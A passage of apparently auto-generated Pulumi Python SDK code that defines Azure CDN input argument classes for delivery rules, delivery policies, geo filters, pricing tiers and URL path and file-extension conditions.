The order in which the rules are applied for the endpoint. Possible values {0,1,2,3,………}. A rule with a lesser order will be applied before a rule with a greater order. Rule with order 0 is a special rule. It does not require any condition and actions listed in it will always be applied.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: pulumi.Input[int]):
pulumi.set(self, "order", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]]:
"""
A list of conditions that must be matched for the actions to be executed
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Union['DeliveryRuleUrlFileExtensionConditionArgs', 'DeliveryRuleUrlPathConditionArgs']]]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class EndpointPropertiesUpdateParametersDeliveryPolicyArgs:
def __init__(__self__, *,
rules: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]],
description: Optional[pulumi.Input[str]] = None):
"""
A policy that specifies the delivery rules to be used for an endpoint.
:param pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]] rules: A list of the delivery rules.
:param pulumi.Input[str] description: User-friendly description of the policy.
"""
pulumi.set(__self__, "rules", rules)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def rules(self) -> pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]]:
"""
A list of the delivery rules.
"""
return pulumi.get(self, "rules")
@rules.setter
def rules(self, value: pulumi.Input[Sequence[pulumi.Input['DeliveryRuleArgs']]]):
pulumi.set(self, "rules", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
User-friendly description of the policy.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@pulumi.input_type
class GeoFilterArgs:
def __init__(__self__, *,
action: pulumi.Input['GeoFilterActions'],
country_codes: pulumi.Input[Sequence[pulumi.Input[str]]],
relative_path: pulumi.Input[str]):
"""
Rules defining user's geo access within a CDN endpoint.
:param pulumi.Input['GeoFilterActions'] action: Action of the geo filter, i.e. allow or block access.
:param pulumi.Input[Sequence[pulumi.Input[str]]] country_codes: Two letter country codes defining user country access in a geo filter, e.g. AU, MX, US.
:param pulumi.Input[str] relative_path: Relative path applicable to geo filter. (e.g. '/mypictures', '/mypicture/kitty.jpg', and etc.)
"""
pulumi.set(__self__, "action", action)
pulumi.set(__self__, "country_codes", country_codes)
pulumi.set(__self__, "relative_path", relative_path)
@property
@pulumi.getter
def action(self) -> pulumi.Input['GeoFilterActions']:
"""
Action of the geo filter, i.e. allow or block access.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: pulumi.Input['GeoFilterActions']):
pulumi.set(self, "action", value)
@property
@pulumi.getter(name="countryCodes")
def country_codes(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Two letter country codes defining user country access in a geo filter, e.g. AU, MX, US.
"""
return pulumi.get(self, "country_codes")
@country_codes.setter
def country_codes(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "country_codes", value)
@property
@pulumi.getter(name="relativePath")
def relative_path(self) -> pulumi.Input[str]:
"""
Relative path applicable to geo filter. (e.g. '/mypictures', '/mypicture/kitty.jpg', and etc.)
"""
return pulumi.get(self, "relative_path")
@relative_path.setter
def relative_path(self, value: pulumi.Input[str]):
pulumi.set(self, "relative_path", value)
@pulumi.input_type
class SkuArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[Union[str, 'SkuName']]] = None):
"""
The pricing tier (defines a CDN provider, feature list and rate) of the CDN profile.
:param pulumi.Input[Union[str, 'SkuName']] name: Name of the pricing tier.
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[Union[str, 'SkuName']]]:
"""
Name of the pricing tier.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[Union[str, 'SkuName']]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class UrlFileExtensionConditionParametersArgs:
def __init__(__self__, *,
extensions: pulumi.Input[Sequence[pulumi.Input[str]]],
odata_type: pulumi.Input[str]):
"""
Defines the parameters for the URL file extension condition.
:param pulumi.Input[Sequence[pulumi.Input[str]]] extensions: A list of extensions for the condition of the delivery rule.
"""
pulumi.set(__self__, "extensions", extensions)
pulumi.set(__self__, "odata_type", odata_type)
@property
@pulumi.getter
def extensions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of extensions for the condition of the delivery rule.
"""
return pulumi.get(self, "extensions")
@extensions.setter
def extensions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "extensions", value)
@property
@pulumi.getter(name="odataType")
def odata_type(self) -> pulumi.Input[str]:
return pulumi.get(self, "odata_type")
@odata_type.setter
def odata_type(self, value: pulumi.Input[str]):
pulumi.set(self, "odata_type", value)
@pulumi.input_type
class UrlPathConditionParametersArgs:
def __init__(__self__, *,
match_type: pulumi.Input[str],
odata_type: pulumi.Input[str],
path: pulumi.Input[str]):
"""
Defines the parameters for the URL path condition.
:param pulumi.Input[str] match_type: The match type for the condition of the delivery rule
:param pulumi.Input[str] path: A URL path for the condition of the delivery rule
"""
pulumi.set(__self__, "match_type", match_type)
pulumi.set(__self__, "odata_type", odata_type)
pulumi.set(__self__, "path", path)
@property
@pulumi.getter(name="matchType")
def match_type(self) -> pulumi.Input[str]:
"""
The match type for the condition of the delivery rule
"""
return pulumi.get(self, "match_type")
@match_type.setter
def match_type(self, value: pulumi.Input[str]):
pulumi.set(self, "match_type", value)
@property
@pulumi.getter(name="odataType")
def odata_type(self) -> pulumi.Input[str]:
return pulumi.get(self, "odata_type")
@odata_type.setter
def odata_type(self, value: pulumi.Input[str]):
pulumi.set(self, "odata_type", value)
@property
@pulumi.getter
def path(self) -> pulumi.Input[str]:
"""
A URL path for the condition of the delivery rule
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: pulumi.Input[str]):
pulumi.set(self, "path", value) | 0.868213 | 0.07703 |